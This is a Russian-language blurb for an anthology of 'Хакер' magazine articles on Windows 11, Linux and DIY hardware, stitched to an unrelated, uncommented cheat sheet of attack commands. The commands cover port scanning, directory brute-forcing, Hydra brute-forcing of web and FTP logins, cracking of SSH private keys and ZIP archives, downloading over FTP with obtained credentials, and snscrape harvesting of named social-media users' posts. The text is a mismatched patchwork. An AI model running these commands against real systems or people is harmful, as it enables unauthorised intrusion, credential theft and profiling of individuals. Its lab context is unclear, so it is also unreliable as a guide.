Сборник лучших, тщательно отобранных статей из легендарного журнала «Хакер». Рассмотрены операционные системы Windows 11 и Linux с точки зрения организации эффективной работы на ПК. Описаны полезные приложения для этих ОС, утилиты для работы в терминале. Рассказано о программах для стеганографии — скрытия полезных данных в графических изображениях. Даны практические советы для пользователей Windows 11 по удаленной установке ОС, отключению телеметрии, удалению программ и компонент, тонкой настройке системы, ее оптимизации для работы на несовместимом и устаревшем оборудовании. Подробно описаны различные настройки Linux для безопасной работы. Представлены примеры постройки самодельного корпуса для ПК, установки суперконденсатора в беспроводную мышь, сборки самодельного ноутбука. Приведен обзор возможностей устройств Apple на базе процессоров М1 и даны советы по их эффективному использованию. Для пользователей ПК.

$ rustscan -a ip_address

$ nmap -sC -sV ip_address
$ nmap -sC -sV -p22,80 ip_address

$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --url ip_address -t 50

$ dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u 'http://site.com'

$ hydra -l john -P /usr/share/wordlists/rockyou.txt ip_address http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid." -V

$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

snscrape --max-results 10 vkontakte-user username > vk-@username.txt

snscrape --max-results 10 --jsonl vkontakte-user username > vk-@username_jsonl.txt

snscrape --max-results 10 --jsonl vkontakte-user group_name > vk-@group_name_jsonl.txt

snscrape --max-results 10 --jsonl telegram-channel channel_name > telegram-@channel_name_jsonl.txt

snscrape --max-results 10 --jsonl instagram-user username > instagram-@username_jsonl.txt

$ rustscan -a ip_address

$ nmap -sC -sV ip_address
$ nmap -sC -sV -p21,80,1337 ip_address

$ gobuster dir -w /usr/share/dirb/wordlists/common.txt -t 50 -x php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx  -u ip_address

fcrackzip -D -p rockyou.txt -u backup.zip -v

$ hydra -l ftpuser -P rockyou.txt ftp://ip_address -V

wget -r ftp://username:password@ipaddress/

$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

$ ssh -i id_rsa user@ip_address -p 1337

Полезная шпаргалка по взлому SSH. Всё от установки подключения, до генерации ключей, различных утилит для поиска и сканирования уязвимостей и взлома паролей Hydra